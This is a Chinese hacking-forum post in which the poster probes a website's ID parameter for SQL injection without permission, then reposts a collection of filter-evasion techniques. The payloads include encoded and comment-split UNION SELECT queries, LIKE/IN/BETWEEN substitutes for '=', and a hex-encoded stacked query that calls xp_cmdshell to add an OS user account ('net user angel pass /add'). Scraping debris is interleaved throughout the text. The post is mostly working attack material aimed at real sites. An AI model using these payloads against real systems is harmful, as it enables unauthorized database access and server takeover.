路过这个网站,检测了一下.& M1 W, D; `6 {/ A+ p/ C
http://www.xxx.cn/Article.asp?ID=117 and 1=1% I6 m! n" |# ]- Z7 b
直接返回主页" T4 W* i3 E6 l
http://www.xxx.cn/Article.asp?ID=117 or 1=1
& f' A2 u! b* m# w5 H1 b直接返回主页
7 z8 d+ b6 D. _0 S; ?5 f- Yhttp://www.xxx.cn/Article.asp?ID=117 or' s5 b- P L% I p% L( J. N
没有返回主页 没有过滤or
$ V9 Y! B9 t, z3 Y; t/ P9 zhttp://www.xxx.cn/Article.asp?ID=117 and
# E8 p# I7 }! s* t0 s4 }9 e直接返回主页 看来过滤了and8 S; \& \) Y" P+ ^
http://www.xxx.cn/Article.asp?ID=117 or 18 E- Q/ [# h( `
没有返回主页 即没有过滤or 也没有过滤1/ c, a- Q# n# h9 z2 N$ A$ A
http://www.xxx.cn/Article.asp?ID=117 or 1=1
, e" V# F2 I& v- h: |/ ], l& _, P直接返回主页 很明显过滤了等号
" g* Q! F* V( i, l) ~: H0 Nor的特性是与and相反的.
* m' f, C/ G: ?+ nor 1=1 爆错 或与原页面不同7 |; ~) g: T3 P' r* l6 M# G
or 1=2 原页面相同' \+ i3 ?. K* y$ u+ I
这样就是一个注入点% k+ t' G, [ e- C& T4 M+ |4 ?
但他过滤了=号 我就用><号代替=号吧!
" v7 L1 `. J0 z, m3 jor 1<2 很明显是正确的,所以应该与原页面不同) D) C$ N# h6 W! A, H( s
or 1>2 很明显是错误的,所以应该与原页面相同! m$ b3 N) t. }# q- h. s
然后看看有没有过滤其他的查询语句,比如select." c% e) d4 ], S7 f1 \
http://www.xxx.cn/Article.asp?ID=117 select# Y. w% {7 p: r% m6 k/ G, U
直接返回主页
7 [7 A4 X, B7 @* V又迷茫了..5 t! h2 A* m5 B
. r& c0 T5 u; b$ S: ^8 q; v( W
D. \ S6 d2 A& ^cookies注入.和以下的方法全都试过了,都失败了.还有什么方法可以饶过吗5 o' q/ U, Z/ T; c. h) R2 z
这个系统我以为是my动力,后台却是这样的http://www.xxx.cn/admin.asp(应该不是假够台吧)
; L/ a. ^9 Y0 ]% n# M================================================ F# ]0 f% S2 I$ l) Y0 H
以下是转贴:
+ j( B, r6 w% v1 D, O1 U: K! \: k2 v- W7 X
突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好……
4 P, P/ V Z. o: s9 j+ H% C经过我的收集,大部分的防注入程序都过滤了以下关键字:
1 r F$ I3 I2 t4 vand | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =
7 e5 d) F/ m, q/ a. @而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。
+ S" m8 u4 c o' b5 r% d9 M- T( y对于关键字的过滤,以下是我收集的以及我个人的一些想法。 ' F4 |7 u& ?* ]. G, B) `
1、运用编码技术绕过 ' E0 h$ `1 x) ]5 V) @$ u
如URLEncode编码,ASCII编码绕过。例如or 1=1即
" j2 q& R0 B: E) u5 ?* o, G! E%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。 4 n4 t3 h j( f3 x- i! B
7 |+ \) [+ f* x. P+ T
2、通过空格绕过 - |( C1 P& X6 P. A
如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如
( H" l; H8 Z: `; \or’ swords’ =‘swords’ M, l7 f. E( H& X- D
,由于mssql的松散性,我们可以把or ’swords’ 之间的空格去掉,并不影响运行。 + J+ |- G4 h" ^( n% a
3、运用字符串判断代替 ^+ ]9 g1 x4 ?
用经典的or 1=1判断绕过,如 0 D( x* E/ U F+ a6 E. t( b
or ’swords’ =’swords’ # z7 Y0 E" q3 l6 s' X6 Z5 d
,这个方法就是网上在讨论的。
0 |' D! M" [8 l. i% T- V+ L4、通过类型转换修饰符N绕过 1 A( d% W! x- [8 w+ f% A
可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or ’swords’ = N’ swords’ ,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。 % j9 ^9 Y; p; W- v
5、通过+号拆解字符串绕过
4 D( h) l2 o% ?4 o1 J效果值得考证,但毕竟是一种方法。如
- m9 A" d- L9 Lor ’swords’ =‘sw’ +’ ords’ ;EXEC(‘IN’ +’ SERT INTO ’+’ …..’ )
3 H! g% `# `; X' h. i3 |1 K, \) R5 `) a( Q# z6 C6 ]3 Z
6、通过LIKE绕过
, }3 j7 F3 g# I; m' k) g以前怎么就没想到呢?如or & D, H( E$ i* q' o
’swords’ LIKE ’sw’ ; i- L9 ] D, A# J/ r4 U0 A* r- h" Y
!!!显然可以很轻松的绕过 % k, b+ N% a0 x5 m! c) J9 }
“=”“>” 5 j" @/ j# o- y
的限制……
9 |- ~, U. Q# e7、通过IN绕过
; _+ Y. a7 j9 O/ R y& ?* g! X与上面的LIKE的思路差不多,如 / c3 o6 p% d( y( d/ W
or ’swords’ IN (’swords’)
% g7 [- L. [7 o9 P2 E7 b! U6 t& D& w1 n+ a( L
8、通过BETWEEN绕过 9 I7 b) ?" O) C5 j
如 y" ~' Y$ x) r0 p4 g* K
or ’swords’ BETWEEN ’rw’ AND ’tw’ . a* t8 p3 C+ b m t' y
$ S2 ~4 Y, o9 J9、通过>或者<绕过
( U o* [4 {6 T+ N) j+ Wor ’swords’ > ’sw’
# H" V: s6 ]4 }, \or ’swords’ < ’tw’ $ ^# C( w7 z- [; t4 D7 \% x, b# L2 l
or 1<3
# F2 {2 a9 ^4 t) X. x4 y……
6 d4 G0 n0 D `+ W10、运用注释语句绕过
C: D" H& u g# M用/**/代替空格,如:
; Q; M% z5 V4 w4 z2 v) VUNION /**/ Select /**/user,pwd,from tbluser 9 b1 p9 I6 \' m; C! O) A7 ^( A
2 D |! _% ]7 B1 ]. ]
用/**/分割敏感词,如:
+ J; V1 H' U) A, c" k+ o; FU/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser
% o/ H0 b2 n$ B* b
; M; n" B6 q7 T6 `4 N8 p11、用HEX绕过,一般的IDS都无法检测出来
5 E# a5 B% ^9 D; k% F- t5 k0x730079007300610064006D0069006E00 =hex(sysadmin) * |1 `2 P% H5 }
0x640062005F006F0077006E0065007200 =hex(db_owner)
* R; i5 @! o" Z6 M% O另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下: - H' H6 d! p, `2 x, O" m
declare @a sysname
+ U3 B: Q- @4 K select @a= 6 V/ m' v& h2 _9 h3 Q5 W
exec master.dbo.xp_cmdshell @a & A+ y( A) |" P* m6 `0 h) P
效果 / [: N% L1 ~/ A- ]# g" f& I' I
http://www.ilikeplmm.com/show.asp?id=1;declare%20@a% [email=20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a]20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a[/email];-- 9 r5 ^- L7 x& { Y% N% }( f2 }
: j! K0 ^9 \! h( K% c6 o" S其中的 - P7 q2 E4 h+ B: j9 C; }( `
0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 N; } m; c T8 S
就是
4 P8 }, ?7 m! \! Q9 `/ `“net user angel pass /add”* {7 P2 `, P. N# @* ]1 r
0 h0 l+ e+ K$ r$ [: P
一直以来都以为只有空格,tab键和注释符/**/可以用来切割sql关键字,段时间在邪八看了风迅cms注入漏洞那篇帖子,才知道原来回车也可以用来作为分割符(以前竟然没有想到,真是失败)。回车的ascii码是chr(13)&chr(10),至于为什么要两个连在一起,这个我也不知道。转换成url编码形式是%0d%0a,于是就可以用%0d%0a代替空格pass一些过滤空格的检查了。
3 K: G7 K9 e0 l& D% ~. e: Y2 X引申一下,只用%0d能正常执行语句吗?只用%0a呢?测试证明,用任意一种分割在mssql、mysql和access里面都是可以的。 v+ W% Z3 E# o5 |3 M; U
另外,关于mssql的多语句问题。我以前一直以为必须用分号作为语句的结尾,后来发现,完全不是那样。类似
`4 j4 Q. I5 O6 DCopy code5 [2 k& u) j! |3 W! E7 u( p0 C4 G
select * from table exec xp_cmdshell'xxxxxxxxxx') T7 f3 \& @( E2 S" j2 p5 r
9 w3 P2 |, |9 t' p+ s+ f4 H" Q
0 e# f& e6 E( |" N8 j4 g. t# j
select * from table/**/exec xp_cmdshell'xxxxxxxxxx'+ j7 ^' i; U3 |+ k4 H
+ H0 W( b t3 S6 J. c! H4 ~$ p% B8 z% F$ ]& ]; b$ K
select * from table|---tab---|exec xp_cmdshell'xxxxxxxxxx'+ j) @2 a6 q9 R3 Q% Q+ b& P* Z6 _
& r% ?# a# L9 ] i& T+ C5 `8 \. b. }! k, p
select * from table|---enter---|exec xp_cmdshell'xxxxxxxxxx'
" J, c1 V7 \, c
d+ ]8 o$ v8 _% ]- ]的语句都是可以正常执行的。而我以前竟然一直不知道!不过这个貌似跟连接数据库驱动有关系,odbc可以正常执行,sqloledb的话就会报错。有兴趣的继续研究吧?
{: c4 K5 x6 e/ d/ e9 x0 D& D- u$ F) v7 v# T
这样,以后遇到带空格过滤关键字的拦截程序,又可以发挥发挥了
9 o; Q& V/ G* ?) g0 r* r: b) U可能大家早就知道了,不管怎么说,发在这里吧!1 W( K5 X1 r+ q6 s& l$ K2 H- V! c
1 q6 u& S- {4 A. z/ ~# Y/ u% U
最近想起可能还有些ascii码可以用来在sql语句中代替空格,于是写个脚本测试了一下,结果在所有128个低位ascii字符中,chr(12)也可以在access里用,不过貌似chr(12)不能出现在and、or之类的关键词附近,原因不清楚。mysql中比access多一个chr(11)可以。至于mssql,挖日,直接从1到32的ascii码换成字符后都可以正常使用。2 g( p# e& M# P1 }) B# @3 H$ u
: @- s) B+ Y, U3 i% R
+ F% b ?) R7 m$ s9 t: Y) ?; {/ r0 L" G& q8 q1 M
对于中间应该出现空格的地方,用()进行替换,不过,对于很复杂的SQL语句就不太好用了。上面说到的是字符型的,如果是数值型,可以在id=1后加一个括号,不过这个我没有测试,
3 C3 x9 Q6 M6 Y" y" h# W1 c; e比如:jmdcw.asp?id=(1)and(select.....),应该是可行的吧? . t- _" T2 B8 [/ C: _
& H! u/ k- {0 | |
发表于 2012-9-15 14:47:46
收藏
支持
反对